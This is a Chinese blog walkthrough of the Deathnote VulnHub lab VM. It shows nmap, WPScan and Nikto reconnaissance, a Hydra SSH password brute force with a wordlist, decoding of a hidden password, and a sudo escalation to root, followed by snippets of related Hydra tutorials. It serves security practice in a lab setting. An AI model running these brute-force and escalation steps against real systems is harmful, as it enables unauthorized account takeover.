Deathnote

最新推荐文章于 2024-02-02 10:17:44 发布
原创 最新推荐文章于 2024-02-02 10:17:44 发布 · 747 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #网络安全 #学习

本文详细记录了对192.168.0.111的网络扫描过程,包括Nmap探测主机状态、服务版本、开放端口,WPScan检测WordPress安全漏洞,以及Nikto和Hydra进行密码暴力破解尝试。重点关注了WordPress的配置弱点和版本信息。 
$ sudo nmap -sP 192.168.0.1/24 

Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-05 14:35 CST
Nmap scan report for 192.168.0.1
Host is up (0.00050s latency).
MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies)
Nmap scan report for 192.168.0.100
Host is up (0.20s latency).
MAC Address: 94:E2:3C:A7:02:C9 (Intel Corporate)
Nmap scan report for 192.168.0.103
Host is up (0.16s latency).
MAC Address: 52:43:BB:A1:BF:A7 (Unknown)
Nmap scan report for 192.168.0.105
Host is up (0.18s latency).
MAC Address: C8:94:02:0F:E5:33 (Chongqing Fugui Electronics)
Nmap scan report for earth.local (192.168.0.108)
Host is up (0.18s latency).
MAC Address: 50:01:D9:DA:FA:DD (Huawei Technologies)
Nmap scan report for 192.168.0.109
Host is up (0.0010s latency).
MAC Address: E8:6A:64:83:2C:C0 (Lcfc(hefei) Electronics Technology)
Nmap scan report for 192.168.0.111
Host is up (0.00047s latency).
MAC Address: 08:00:27:B6:FA:40 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.0.104
Host is up.
Nmap done: 256 IP addresses (8 hosts up) scanned in 6.72 seconds

$ sudo nmap -sV -sC -A 192.168.0.111

Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-05 14:35 CST
Nmap scan report for 192.168.0.111
Host is up (0.00052s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE    SERVICE VERSION
22/tcp open     ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 5e:b8:ff:2d:ac:c7:e9:3c:99:2f:3b:fc:da:5c:a3:53 (RSA)
|   256 a8:f3:81:9d:0a:dc:16:9a:49:ee:bc:24:e4:65:5c:a6 (ECDSA)
|_  256 4f:20:c3:2d:19:75:5b:e8:1f:32:01:75:c2:70:9a:7e (ED25519)
53/tcp filtered domain
80/tcp open     http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:B6:FA:40 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.52 ms 192.168.0.111

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.63 seconds

$ wpscan --url http://192.168.0.111/wordpress -e u

_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.20
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.0.111/wordpress/ [192.168.0.111]
[+] Started: Tue Apr  5 15:12:26 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.38 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.0.111/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.0.111/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.0.111/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.0.111/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.8 identified (Insecure, released on 2021-07-20).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.0.111/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.8'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.0.111/wordpress/, Match: 'WordPress 5.8'

[i] The main theme could not be detected.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <================================================================================================================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] kira
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue Apr  5 15:12:27 2022
[+] Requests Done: 48
[+] Cached Requests: 4
[+] Data Sent: 12.469 KB
[+] Data Received: 136.091 KB
[+] Memory used: 151.547 MB
[+] Elapsed time: 00:00:00

$ nikto -host http://deathnote.vuln/wordpress

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.0.111
+ Target Hostname:    deathnote.vuln
+ Target Port:        80
+ Start Time:         2022-04-05 15:13:34 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://deathnote.vuln/wordpress/index.php/wp-json/>; rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: POST, OPTIONS, HEAD, GET 
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /wordpress/wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ /wordpress/wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /wordpress/license.txt: License file found may identify site software.
+ /wordpress/: A Wordpress installation was found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ OSVDB-3268: /wordpress/wp-content/uploads/: Directory indexing found.
+ /wordpress/wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information
+ /wordpress/wp-login.php: Wordpress login found
+ 7785 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time:           2022-04-05 15:14:16 (GMT8) (42 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

username:kira
passwd:iamjustic3

<!-- notes.txt -->
death4
death4life
death4u
death4ever
death4all
death420
death45
death4love
death49
death48
death456
death4014
1death4u
yaydeath44
thedeath4u2
thedeath4u
stickdeath420
reddeath44
megadeath44
megadeath4
killdeath405
hot2death4sho
death4south
death4now
death4l0ve
death4free
death4elmo
death4blood
death499Eyes301
death498
death4859
death47
death4545
death445
death444
death4387n
death4332387
death42521439
death42
death4138
death411
death405
death4me

$ hydra -l l -P ~/notes.txt 192.168.0.111 ssh

Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-04-05 16:02:07
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 43 login tries (l:1/p:43), ~3 tries per task
[DATA] attacking ssh://192.168.0.111:22/
[22][ssh] host: 192.168.0.111   login: l   password: death4me
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-04-05 16:02:16

l@deathnote:~$ ls

user.txt

l@deathnote:~$ cat user.txt 

++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>+++++.<<++.>>+++++++++++.------------.+.+++++.---.<<.>>++++++++++.<<.>>--------------.++++++++.+++++.<<.>>.------------.---.<<.>>++++++++++++++.-----------.---.+++++++..<<.++++++++++++.------------.>>----------.+++++++++++++++++++.-.<<.>>+++++.----------.++++++.<<.>>++.--------.-.++++++.<<.>>------------------.+++.<<.>>----.+.++++++++++.-------.<<.>>+++++++++++++++.-----.<<.>>----.--.+++..<<.>>+.--------.<<.+++++++++++++.>>++++++.--.+++++++++.-----------------.

i think u got the shell , but you wont be able to kill me -kira

l@deathnote:~$ find / -name "L"

/opt/L

63 47 46 7a 63 33 64 6b 49 44 6f 67 61 32 6c 79 59 57 6c 7a 5a 58 5a 70 62 43 41 3d

cGFzc3dkIDoga2lyYWlzZXZpbCA=

passwd : kiraisevil 

```bash
l@deathnote:/opt/L/fake-notebook-rule$ su kira

Password: 

kira@deathnote:/opt/L/fake-notebook-rule$ id

uid=1001(kira) gid=1001(kira) groups=1001(kira),27(sudo)

kira@deathnote:/opt/L/fake-notebook-rule$ sudo su -l

[sudo] password for kira: 

root@deathnote:~# ls

root.txt

root@deathnote:~# cat root.txt 



      ::::::::       ::::::::       ::::    :::       ::::::::       :::::::::           :::    :::::::::::       :::::::: 
    :+:    :+:     :+:    :+:      :+:+:   :+:      :+:    :+:      :+:    :+:        :+: :+:      :+:          :+:    :+: 
   +:+            +:+    +:+      :+:+:+  +:+      +:+             +:+    +:+       +:+   +:+     +:+          +:+         
  +#+            +#+    +:+      +#+ +:+ +#+      :#:             +#++:++#:       +#++:++#++:    +#+          +#++:++#++   
 +#+            +#+    +#+      +#+  +#+#+#      +#+   +#+#      +#+    +#+      +#+     +#+    +#+                 +#+    
#+#    #+#     #+#    #+#      #+#   #+#+#      #+#    #+#      #+#    #+#      #+#     #+#    #+#          #+#    #+#     
########       ########       ###    ####       ########       ###    ###      ###     ###    ###           ########       

##########follow me on twitter###########3
and share this screen shot and tag @KDSAMF
root@deathnote:~# exit
logout
九头蛇--hydra爆破密码实现远程连接登录
Aisen_bear的博客
10-03 4997
Hydra是一个相当强大的暴力密码破解工具。该工具支持几乎所有协议的在线密码破解,如FTP、HTTP、HTTPS、MySQL、MS SQL、Oracle、Cisco、IMAP和VNC等。其密码能否被破解,关键在于字典是否足够强大。下面演示一下hydra的简单实用。 准备环节 1台centos虚拟机:IP192.168.xx.xx 账号root 密码1234(靶机) 1台kali虚拟机 (主机) 一份爆破用字典(账户爆破字典、密码爆破字典) 参数简介 hydra的主要选项 -R 修复以前使用.
deathnote靶机
mirliasheong的博客
01-08 533
这个时候想起来了靶机主页面有一句话,他说我最喜欢的句子是iamjustic3,这个可能是密码吗,我们尝试一下,登陆成功。我们发现了一个robots.txt和wp-login.php挨个访问。打开靶机——>更改网卡(ens33)——>扫描靶机——>访问靶机。一点看不懂,上网搜了一下,这个是Brainfuck编程语言的程序。我们注意到了important.jpg这个图片,一会去访问一下。发现了一个user.txt,去访问一下(not found)ls查看一下发现了user.txt,在cat一下。
靶机渗透练习85-HackathonCTF 1
hirak0的博客
04-28 1012
靶机描述 靶机地址:https://www.vulnhub.com/entry/hackathonctf-1,591/ Description N/A 一、搭建靶机环境 攻击机Kali: IP地址:192.168.9.3 靶机: IP地址:192.168.9.2 注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式) 该靶机环境搭建如下 将下载好的靶机环境,导入 VritualBox,设置为 Host-Only 模式 将 VMware 中桥接模式网卡设置
靶机渗透练习86-HackathonCTF 2
hirak0的博客
04-29 794
靶机描述 靶机地址:https://www.vulnhub.com/entry/hackathonctf-2,714/ Description Difficulty: Easy This is a basic level BootToRoot machine for beginners. There are two flags. After finding the flag, tag me on Twitter(@Markme_1). 一、搭建靶机环境 攻击机Kali: IP地址:192.168.12
hydra密码暴力破解工具
qq_35376839的博客
03-11 1017
/hydra -v -V -l root -x 8 8 1 -t 64 -q 192.168.2.1 ftp 用户名root密码长度8~8,全数字,64线程 ftp协议 实测6位数字密码几分钟就破完了,大家设置密码的时候还是要注意密码复杂度。随便来个字母大小写+特殊符号+数组,破解难度几何式增长。 密码生成器格式: Examples: -x 3:5:a generate passwords from length 3 to 5 with all lowercase letters -x 5.
hydra笔记-利用hydra暴力破解ssh弱口令
IT1995的博客
04-28 9455
这里我搭了台虚拟机。ssh开放的22端口。用户名密码都是root。 下载windows版本的hydra GitHub - maaaaz/thc-hydra-windows at v9.1 解压就可以了 这里要自己下载一个字典,也就是这样的。这里面有很多字符串,代表密码,到时候这个软件会一个一个试。 用cmd进如目录: D:\hackSoftware\thc-hydra-windows-v9.1>hydra -l root -o 1.txt -f -P D:\hackSoftw
DEATHNOTE
10-24
DEATHNOTE》——探索字体设计的艺术与应用 在数字化时代,字体设计不仅是文字的呈现方式,更是传达信息、塑造品牌形象、营造氛围的关键元素。"DEATHNOTE"这个标题,或许让人联想到著名的日本动漫作品《死亡笔记》...
DeathNote-crx插件
04-06
"DeathNote-crx插件"是一款专为浏览器设计的扩展程序,主要特色在于它将流行的《死亡笔记》(Death Note)元素融入了用户的网络浏览体验。这款插件以德语(Deutsch)为主要语言,旨在为每一个新打开的标签页带来一种...
DeathNote.github.io
05-30
"死亡笔记.github.io"是一个基于GitHub Pages构建的个人网页项目,标题中的"DeathNote.github.io"通常是指这个项目的在线地址,表明它是一个公开的、与《死亡笔记》这个主题相关或者以此为灵感的个人网站。...
HTB靶机08-Nineveh-WP
灰蜗牛
05-08 887
HTB靶机08-Nineveh-WP 总体思路:端口扫描、Web扫描、弱口令爆破、漏洞利用,信息搜集,knock程序、SSH,chkrootkit
hydra篇 — hydra的使用说明
|汾西公子
09-07 3906
介绍: 每个密码安全性研究都显示,最大的安全漏洞是密码。该工具是概念证明代码,旨在为研究人员和安全顾问提供可能性,以显示从远程访问系统的未经授权的访问将是多么容易。 此工具仅用于法律目的! 已经有几种登录黑客工具可用,但是,没有一个工具支持多种协议来攻击或支持并行连接。 经过测试,可以在Linux,Windows / Cygwin,Solaris,FreeBSD / OpenBSD,QNX(Blackberry 10)和MacOS上进行干净编译。 当前,该工具支持以下协议:Asterisk,AF
hydra
Blog_inG的博客
09-07 1876
root@kali:~# hydra -h Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|
暴力破解工具Hydra 使用
大哥一声吼
07-09 2195
kali 自带的hydra 工具,直接使用即可,不再赘述安装过程 常用命令如下 hydra -l user -P passlist.txt ftp://192.168.0.1 hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5 hydra -l admin -p password ...
靶机渗透练习30-Funbox9-GaoKao
hirak0的博客
04-18 1035
靶机描述 靶机地址:https://www.vulnhub.com/entry/funbox-gaokao,707/ Description It’s a box for beginners, but not easy. Gather careful !!! Hint: Don’t waste your time ! Every BruteForce-Attack at all ports can be stopped after 1500 trys per account. Enjoy the game
穷举爆破工具hydra
weixin_46580614的博客
07-16 2085
帮助 穷举爆破工具hydra 帮助 -R 继续从上一次进度接着破解。 -S 采用SSL链接。 -s PORT 可通过这个参数指定非默认端口。 -l LOGIN 指定破解的用户,对特定用户破解。 -L FILE 指定用户名字典。 -p PASS 小写,指定密码破解,少用,一般是采用密码字典。 -P FILE 大写,指定密码字典。 -e ns 可选选项,n:空密码试探,s:使用指定用户和密码试探。 -C FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数。 -M FILE 指定目标列表文件一
Linux安全-攻击篇-密码破解之Hydra工具
cd27380201的博客
08-10 2701
1.前言 1.1 关于法律 本文仅从安全角度去探讨测试,请勿非法使用,遵守法律法规。 1.2 Hydra介绍 Hydra是一款基于协议的在线连接测试密码安全工具,支持多款协议。 1.3 测试环境 Linux多使用SSH协议进行登录管理,所以本文仅介绍Hydra关于SSH方面的使用,从而进行测试、破解密码。 Linux版本: [root@legend_never_dies opt]# uname -a Linux legend_never_dies 3.10.0-1127.el7.x86_64 #1 SMP
【DC渗透系列】DC-2靶场
xydsg的博客
02-02 773
受限制shell(rbash–>相当于你的权限很低,很多命令用不了)的原因,命令type,cat,more,vim都无法查看。C:\Windows\System32\drivers\etc\hosts(Windows系统)另一条路,账号名密码都有,想到前面的7744ssh端口爆破。flag中提示说要登录,找不到flag2就换个号登。开了80的http端口和7744的ssh的端口。找到http://dc-2/wp-admin/(1)vi 文件名 //文件名自取。url跳到http://dc-2/
vulhub打靶第二周
qq_64201116的博客
06-11 732
因此,命令在执行时可能会按照预期将参数作为一个整体进行处理,并执行其中的多个命令。这里使用了system执行命令,而且需要一个参数,只会把第一个参数作为命令来执行。用hydra爆破一下,先创建两个文件,一个。
deathnote靶机如何改网卡
最新发布
06-09
### 修改 DeathNote 靶机中网卡设置的方法 在渗透测试靶机如 DeathNote 中,修改网卡设置通常涉及配置网络接口的 IP 地址、子网掩码、网关以及 DNS 服务器等信息。以下是具体的实现方法: #### 1. 查看当前网卡信息 使用以下命令查看系统中的网络接口及其状态: ```bash ifconfig ``` 或者在较新的 Linux 系统中使用: ```bash ip a ``` 此命令将列出所有可用的网络接口及其配置信息[^1]。 #### 2. 编辑网卡配置文件 DeathNote 靶机基于 Kali Linux,其网络配置文件通常位于 `/etc/network/interfaces` 或 `/etc/netplan/` 目录下。具体路径取决于系统版本。 - **对于传统 `interfaces` 文件:** 编辑 `/etc/network/interfaces` 文件以修改网卡设置: ```bash nano /etc/network/interfaces ``` 在文件中添加或修改类似以下内容: ```plaintext auto eth0 iface eth0 inet static address 192.168.1.100 netmask 255.255.255.0 gateway 192.168.1.1 dns-nameservers 8.8.8.8 8.8.4.4 ``` 这里,`eth0` 是网卡名称,需根据实际环境替换为正确的接口名称[^2]。 - **对于 Netplan 配置:** 如果系统使用 Netplan,则需要编辑 `/etc/netplan/*.yaml` 文件。例如: ```bash nano /etc/netplan/01-netcfg.yaml ``` 添加或修改如下内容: ```yaml network: version: 2 renderer: networkd ethernets: eth0: dhcp4: no addresses: - 192.168.1.100/24 gateway4: 192.168.1.1 nameservers: addresses: - 8.8.8.8 - 8.8.4.4 ``` 修改完成后,应用配置: ```bash netplan apply ``` #### 3. 使用临时命令修改 IP 地址 如果仅需临时更改 IP 地址,可以使用以下命令: ```bash ifconfig eth0 192.168.1.100 netmask 255.255.255.0 up ``` 或者使用 `ip` 命令: ```bash ip addr add 192.168.1.100/24 dev eth0 ip link set eth0 up ``` 随后设置默认网关: ```bash route add default gw 192.168.1.1 ``` 或者使用 `ip` 命令: ```bash ip route add default via 192.168.1.1 ``` #### 4. 验证网络配置 完成上述操作后,验证网络连接是否正常: ```bash ping 192.168.1.1 ``` 检查 DNS 是否生效: ```bash nslookup google.com ``` ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值